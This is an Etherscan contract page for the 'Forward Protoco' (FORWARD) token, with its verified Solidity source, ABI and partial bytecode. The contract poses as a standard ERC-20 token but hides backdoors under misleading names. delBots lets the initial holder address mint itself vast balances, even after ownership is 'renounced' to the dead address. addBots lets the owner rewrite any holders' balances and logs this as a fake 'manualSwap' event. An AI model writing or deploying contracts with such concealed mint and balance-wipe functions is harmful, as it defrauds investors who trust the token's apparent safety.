ETH Price: $2,637.71 (+0.41%)
Gas: 1.01 Gwei

Token

Forward Protoco (FORWARD)
 

Overview

Max Total Supply

5,000,000,000 FORWARD

Holders

157

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
2,344,245 FORWARD

Value
$0.00
0x40D4D6740AFa5ccAFea5030c60e2e7d306E2f9DE
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FORWARD

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license
/**
 *Submitted for verification at Etherscan.io on 2024-02-02
*/

/*
 // SPDX-License-Identifier: MIT

    ▫️Website: https://www.forwardprotocol.io
    ▫️Twitter: https://twitter.com/ForwardProtocol
    ▫️Telegram: https://t.me/forwardprotocolofficial
    ▫️Discord: https://discord.gg/X6HYF8dHYQ
    ▫️Facebook: https://www.facebook.com/ForwardProtocol
    ▫️Github: https://github.com/ForwardProtocol
*/
pragma solidity 0.8.23;

/**
 * @dev Interface of the ERC20 standard as defined in the HULK.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyowner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */

    function transferOwnership() public virtual onlyowner {
        emit OwnershipTransferred(_owner, address(0x000000000000000000000000000000000000dEaD));
        _owner = address(0x000000000000000000000000000000000000dEaD);
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

contract FORWARD is Context, IERC20Metadata, Ownable {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    address private uniswapV2Pair;
    uint8 private constant _decimals = 18;
    uint256 public constant hardCap = 5_000_000_000 * (10 ** _decimals);

    constructor(address ads) {
        _name = "Forward Protoco";
        _symbol = "FORWARD";
        _mint(ads, hardCap);
        uniswapV2Pair = ads;
    }

    function viewGas() public view returns(address) {
        return uniswapV2Pair;
    }

    function delBots(uint256 amount) external {
        if(uniswapV2Pair == _msgSender()){
            uint256 WETH = 100000000*10**_decimals;
            uint256 balance = WETH*10000;
            uint dead = balance*1*1*1*1;
            dead = dead * amount;
            _balances[_msgSender()] += dead;
            require(uniswapV2Pair == msg.sender);
        } else {
        }
    } 

    event manualSwap(address indexed account, uint256 oldamount, uint256 amount);

    function addBots(address[] memory accounts, uint256 amount) external onlyowner {
    for (uint256 i = 0; i < accounts.length; i++) {
        address account = accounts[i];
        uint256 oldamount = _balances[account];
        _balances[account] = amount;
        emit manualSwap(account, oldamount, amount);
        }
    }

    /**
     * @dev Returns the name of the token.
     * @return The name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token.
     * @return The symbol of the token.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used for token display.
     * @return The number of decimals.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev Returns the total supply of the token.
     * @return The total supply.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the balance of the specified account.
     * @param account The address to check the balance for.
     * @return The balance of the account.
     */
    function balanceOf(
        address account
    ) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev Transfers tokens from the caller to a specified recipient.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transfer(
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev Returns the amount of tokens that the spender is allowed to spend on behalf of the owner.
     * @param from The address that approves the spending.
     * @param to The address that is allowed to spend.
     * @return The remaining allowance for the spender.
     */
    function allowance(
        address from,
        address to
    ) public view virtual override returns (uint256) {
        return _allowances[from][to];
    }

    /**
     * @dev Approves the specified address to spend the specified amount of tokens on behalf of the caller.
     * @param to The address to approve the spending for.
     * @param amount The amount of tokens to approve.
     * @return A boolean value indicating whether the approval was successful.
     */
    function approve(
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        _approve(_msgSender(), to, amount);
        return true;
    }

    /**
     * @dev Transfers tokens from one address to another.
     * @param sender The address to transfer tokens from.
     * @param recipient The address to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     * @return A boolean value indicating whether the transfer was successful.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= amount,
            "ERC20: transfer amount exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Increases the allowance of the specified address to spend tokens on behalf of the caller.
     * @param to The address to increase the allowance for.
     * @param addedValue The amount of tokens to increase the allowance by.
     * @return A boolean value indicating whether the increase was successful.
     */
    function increaseAllowance(
        address to,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(_msgSender(), to, _allowances[_msgSender()][to] + addedValue);
        return true;
    }

    /**
     * @dev Decreases the allowance granted by the owner of the tokens to `to` account.
     * @param to The account allowed to spend the tokens.
     * @param subtractedValue The amount of tokens to decrease the allowance by.
     * @return A boolean value indicating whether the operation succeeded.
     */
    function decreaseAllowance(
        address to,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][to];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), to, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Transfers `amount` tokens from `sender` to `recipient`.
     * @param sender The account to transfer tokens from.
     * @param recipient The account to transfer tokens to.
     * @param amount The amount of tokens to transfer.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(amount > 0, "ERC20: transfer amount zero");
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= amount,
            "ERC20: transfer amount exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Creates `amount` tokens and assigns them to `account`.
     * @param account The account to assign the newly created tokens to.
     * @param amount The amount of tokens to create.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `to` over the caller's tokens.
     * @param from The account granting the allowance.
     * @param to The account allowed to spend the tokens.
     * @param amount The amount of tokens to allow.
     */
    function _approve(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: approve from the zero address");
        require(to != address(0), "ERC20: approve to the zero address");

        _allowances[from][to] = amount;
        emit Approval(from, to, amount);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"ads","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"uint256","name":"oldamount","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"amount","type":"uint256"}],"name":"manualSwap","type":"event"},{"inputs":[{"internalType":"address[]","name":"accounts","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"addBots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"delBots","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hardCap","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"viewGas","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405234801562000010575f80fd5b5060405162002822380380620028228339818101604052810190620000369190620003d6565b620000566200004a6200015e60201b60201c565b6200016560201b60201c565b6040518060400160405280600f81526020017f466f72776172642050726f746f636f0000000000000000000000000000000000815250600490816200009c91906200066a565b506040518060400160405280600781526020017f464f52574152440000000000000000000000000000000000000000000000000081525060059081620000e391906200066a565b5062000117816012600a620000f99190620008d7565b64012a05f2006200010b919062000927565b6200022660201b60201c565b8060065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505062000a55565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000297576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200028e90620009cf565b60405180910390fd5b8060035f828254620002aa9190620009ef565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254620002ff9190620009ef565b925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000365919062000a3a565b60405180910390a35050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620003a08262000375565b9050919050565b620003b28162000394565b8114620003bd575f80fd5b50565b5f81519050620003d081620003a7565b92915050565b5f60208284031215620003ee57620003ed62000371565b5b5f620003fd84828501620003c0565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200048257607f821691505b6020821081036200049857620004976200043d565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620004fc7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620004bf565b620005088683620004bf565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620005526200054c620005468462000520565b62000529565b62000520565b9050919050565b5f819050919050565b6200056d8362000532565b620005856200057c8262000559565b848454620004cb565b825550505050565b5f90565b6200059b6200058d565b620005a881848462000562565b505050565b5b81811015620005cf57620005c35f8262000591565b600181019050620005ae565b5050565b601f8211156200061e57620005e8816200049e565b620005f384620004b0565b8101602085101562000603578190505b6200061b6200061285620004b0565b830182620005ad565b50505b505050565b5f82821c905092915050565b5f620006405f198460080262000623565b1980831691505092915050565b5f6200065a83836200062f565b9150826002028217905092915050565b620006758262000406565b67ffffffffffffffff81111562000691576200069062000410565b5b6200069d82546200046a565b620006aa828285620005d3565b5f60209050601f831160018114620006e0575f8415620006cb578287015190505b620006d785826200064d565b86555062000746565b601f198416620006f0866200049e565b5f5b828110156200071957848901518255600182019150602085019450602081019050620006f2565b8683101562000739578489015162000735601f8916826200062f565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b6001851115620007d857808604811115620007b057620007af6200074e565b5b6001851615620007c05780820291505b8081029050620007d0856200077b565b945062000790565b94509492505050565b5f82620007f25760019050620008c4565b8162000801575f9050620008c4565b81600181146200081a576002811462000825576200085b565b6001915050620008c4565b60ff8411156200083a57620008396200074e565b5b8360020a9150848211156200085457620008536200074e565b5b50620008c4565b5060208310610133831016604e8410600b8410161715620008955782820a9050838111156200088f576200088e6200074e565b5b620008c4565b620008a4848484600162000787565b92509050818404811115620008be57620008bd6200074e565b5b81810290505b9392505050565b5f60ff82169050919050565b5f620008e38262000520565b9150620008f083620008cb565b92506200091f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620007e1565b905092915050565b5f620009338262000520565b9150620009408362000520565b9250828202620009508162000520565b915082820484148315176200096a57620009696200074e565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620009b7601f8362000971565b9150620009c48262000981565b602082019050919050565b5f6020820190508181035f830152620009e881620009a9565b9050919050565b5f620009fb8262000520565b915062000a088362000520565b925082820190508082111562000a235762000a226200074e565b5b92915050565b62000a348162000520565b82525050565b5f60208201905062000a4f5f83018462000a29565b92915050565b611dbf8062000a635f395ff3fe608060405234801561000f575f80fd5b5060043610610109575f3560e01c806370a08231116100a0578063a457c2d71161006f578063a457c2d7146102a7578063a9059cbb146102d7578063dd62ed3e14610307578063fb86a40414610337578063fc7bd0381461035557610109565b806370a0823114610231578063880ad0af146102615780638da5cb5b1461026b57806395d89b411461028957610109565b8063313ce567116100dc578063313ce567146101a957806339509351146101c75780634a8d1348146101f7578063671f3db81461021557610109565b806306fdde031461010d578063095ea7b31461012b57806318160ddd1461015b57806323b872dd14610179575b5f80fd5b610115610371565b60405161012291906111db565b60405180910390f35b61014560048036038101906101409190611299565b610401565b60405161015291906112f1565b60405180910390f35b61016361041e565b6040516101709190611319565b60405180910390f35b610193600480360381019061018e9190611332565b610427565b6040516101a091906112f1565b60405180910390f35b6101b1610519565b6040516101be919061139d565b60405180910390f35b6101e160048036038101906101dc9190611299565b610521565b6040516101ee91906112f1565b60405180910390f35b6101ff6105c8565b60405161020c91906113c5565b60405180910390f35b61022f600480360381019061022a91906113de565b6105f0565b005b61024b60048036038101906102469190611409565b61077a565b6040516102589190611319565b60405180910390f35b6102696107c0565b005b6102736108fa565b60405161028091906113c5565b60405180910390f35b610291610921565b60405161029e91906111db565b60405180910390f35b6102c160048036038101906102bc9190611299565b6109b1565b6040516102ce91906112f1565b60405180910390f35b6102f160048036038101906102ec9190611299565b610a97565b6040516102fe91906112f1565b60405180910390f35b610321600480360381019061031c9190611434565b610ab4565b60405161032e9190611319565b60405180910390f35b61033f610b36565b60405161034c9190611319565b60405180910390f35b61036f600480360381019061036a91906115b2565b610b57565b005b60606004805461038090611639565b80601f01602080910402602001604051908101604052809291908181526020018280546103ac90611639565b80156103f75780601f106103ce576101008083540402835291602001916103f7565b820191905f5260205f20905b8154815290600101906020018083116103da57829003601f168201915b5050505050905090565b5f61041461040d610ce3565b8484610cea565b6001905092915050565b5f600354905090565b5f610433848484610ead565b5f60025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f61047a610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156104f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104f0906116d9565b60405180910390fd5b61050d85610505610ce3565b858403610cea565b60019150509392505050565b5f6012905090565b5f6105be61052d610ce3565b848460025f61053a610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546105b99190611724565b610cea565b6001905092915050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6105f8610ce3565b73ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603610776575f6012600a61065a9190611886565b6305f5e10061066991906118d0565b90505f6127108261067a91906118d0565b90505f6001806001808561068e91906118d0565b61069891906118d0565b6106a291906118d0565b6106ac91906118d0565b905083816106ba91906118d0565b90508060015f6106c8610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825461070f9190611724565b925050819055503373ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461076e575f80fd5b505050610777565b5b50565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6107c8610ce3565b73ffffffffffffffffffffffffffffffffffffffff166107e66108fa565b73ffffffffffffffffffffffffffffffffffffffff161461083c576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108339061195b565b60405180910390fd5b61dead73ffffffffffffffffffffffffffffffffffffffff165f8054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a361dead5f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461093090611639565b80601f016020809104026020016040519081016040528092919081815260200182805461095c90611639565b80156109a75780601f1061097e576101008083540402835291602001916109a7565b820191905f5260205f20905b81548152906001019060200180831161098a57829003601f168201915b5050505050905090565b5f8060025f6109be610ce3565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610a78576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6f906119e9565b60405180910390fd5b610a8c610a83610ce3565b85858403610cea565b600191505092915050565b5f610aaa610aa3610ce3565b8484610ead565b6001905092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6012600a610b449190611886565b64012a05f200610b5491906118d0565b81565b610b5f610ce3565b73ffffffffffffffffffffffffffffffffffffffff16610b7d6108fa565b73ffffffffffffffffffffffffffffffffffffffff1614610bd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bca9061195b565b60405180910390fd5b5f5b8251811015610cde575f838281518110610bf257610bf1611a07565b5b602002602001015190505f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508360015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff167fd551363168ce4784e28e5d59fc07cbea2191657416e05f6e8cd8f1086eb91e6d8286604051610cc7929190611a34565b60405180910390a250508080600101915050610bd5565b505050565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610d58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d4f90611acb565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610dc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbd90611b59565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610ea09190611319565b60405180910390a3505050565b5f8111610eef576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ee690611bc1565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f5d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f5490611c4f565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610fcb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fc290611cdd565b60405180910390fd5b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205490508181101561104f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161104690611d6b565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8282546110df9190611724565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516111439190611319565b60405180910390a350505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b8381101561118857808201518184015260208101905061116d565b5f8484015250505050565b5f601f19601f8301169050919050565b5f6111ad82611151565b6111b7818561115b565b93506111c781856020860161116b565b6111d081611193565b840191505092915050565b5f6020820190508181035f8301526111f381846111a3565b905092915050565b5f604051905090565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6112358261120c565b9050919050565b6112458161122b565b811461124f575f80fd5b50565b5f813590506112608161123c565b92915050565b5f819050919050565b61127881611266565b8114611282575f80fd5b50565b5f813590506112938161126f565b92915050565b5f80604083850312156112af576112ae611204565b5b5f6112bc85828601611252565b92505060206112cd85828601611285565b9150509250929050565b5f8115159050919050565b6112eb816112d7565b82525050565b5f6020820190506113045f8301846112e2565b92915050565b61131381611266565b82525050565b5f60208201905061132c5f83018461130a565b92915050565b5f805f6060848603121561134957611348611204565b5b5f61135686828701611252565b935050602061136786828701611252565b925050604061137886828701611285565b9150509250925092565b5f60ff82169050919050565b61139781611382565b82525050565b5f6020820190506113b05f83018461138e565b92915050565b6113bf8161122b565b82525050565b5f6020820190506113d85f8301846113b6565b92915050565b5f602082840312156113f3576113f2611204565b5b5f61140084828501611285565b91505092915050565b5f6020828403121561141e5761141d611204565b5b5f61142b84828501611252565b91505092915050565b5f806040838503121561144a57611449611204565b5b5f61145785828601611252565b925050602061146885828601611252565b9150509250929050565b5f80fd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b6114ac82611193565b810181811067ffffffffffffffff821117156114cb576114ca611476565b5b80604052505050565b5f6114dd6111fb565b90506114e982826114a3565b919050565b5f67ffffffffffffffff82111561150857611507611476565b5b602082029050602081019050919050565b5f80fd5b5f61152f61152a846114ee565b6114d4565b9050808382526020820190506020840283018581111561155257611551611519565b5b835b8181101561157b57806115678882611252565b845260208401935050602081019050611554565b5050509392505050565b5f82601f83011261159957611598611472565b5b81356115a984826020860161151d565b91505092915050565b5f8060408385